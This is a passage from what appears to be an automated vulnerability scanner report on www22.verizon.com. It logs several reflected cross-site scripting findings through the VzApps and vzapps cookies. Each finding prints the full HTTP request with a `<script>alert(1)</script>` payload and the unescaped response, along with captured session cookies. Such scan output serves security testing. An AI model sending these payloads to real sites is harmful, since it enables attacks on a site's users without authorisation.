NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67985
Expires: Sat, 20 Nov 2010 03:15:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:15:00 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX790ec<script>alert(1)</script>1fb2881387e; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX790EC<SCRIPT>ALERT(1)</SCRIPT>1FB2881387E </DIV>
...[SNIP]...

3.196. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8e301'><script>alert(1)</script>715a473175c was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX8e301'><script>alert(1)</script>715a473175c; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67990
Expires: Sat, 20 Nov 2010 03:14:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:38 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX8e301'><script>alert(1)</script>715a473175c; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8E301'><SCRIPT>ALERT(1)</SCRIPT>715A473175C ' />
...[SNIP]...

3.197. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1bbd6'><script>alert(1)</script>c865fc14b77 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX1bbd6'><script>alert(1)</script>c865fc14b77; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68022
Expires: Sat, 20 Nov 2010 03:14:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:25 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX1bbd6'><script>alert(1)</script>c865fc14b77; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX1BBD6'><SCRIPT>ALERT(1)</SCRIPT>C865FC14B77 ' />
...[SNIP]...

3.198. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload e9fda<script>alert(1)</script>0b8d7546ca4 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXe9fda<script>alert(1)</script>0b8d7546ca4; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68018
Expires: Sat, 20 Nov 2010 03:14:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:37 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXe9fda<script>alert(1)</script>0b8d7546ca4; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXE9FDA<SCRIPT>ALERT(1)</SCRIPT>0B8D7546CA4 </DIV>
...[SNIP]...

3.199. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload d477a<script>alert(1)</script>4e4f8e6dbe8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXd477a<script>alert(1)</script>4e4f8e6dbe8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68018
Expires: Sat, 20 Nov 2010 00:12:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:31 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXd477a<script>alert(1)</script>4e4f8e6dbe8; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXD477A<SCRIPT>ALERT(1)</SCRIPT>4E4F8E6DBE8 </DIV>
...[SNIP]...

3.200. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1327c'><script>alert(1)</script>eb0b45a8082 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX1327c'><script>alert(1)</script>eb0b45a8082; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68022
Expires: Sat, 20 Nov 2010 00:11:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:52 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX1327c'><script>alert(1)</script>eb0b45a8082; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX1327C'><SCRIPT>ALERT(1)</SCRIPT>EB0B45A8082 ' />
...[SNIP]...

3.201. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9ed63'><script>alert(1)</script>aba8646129c was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
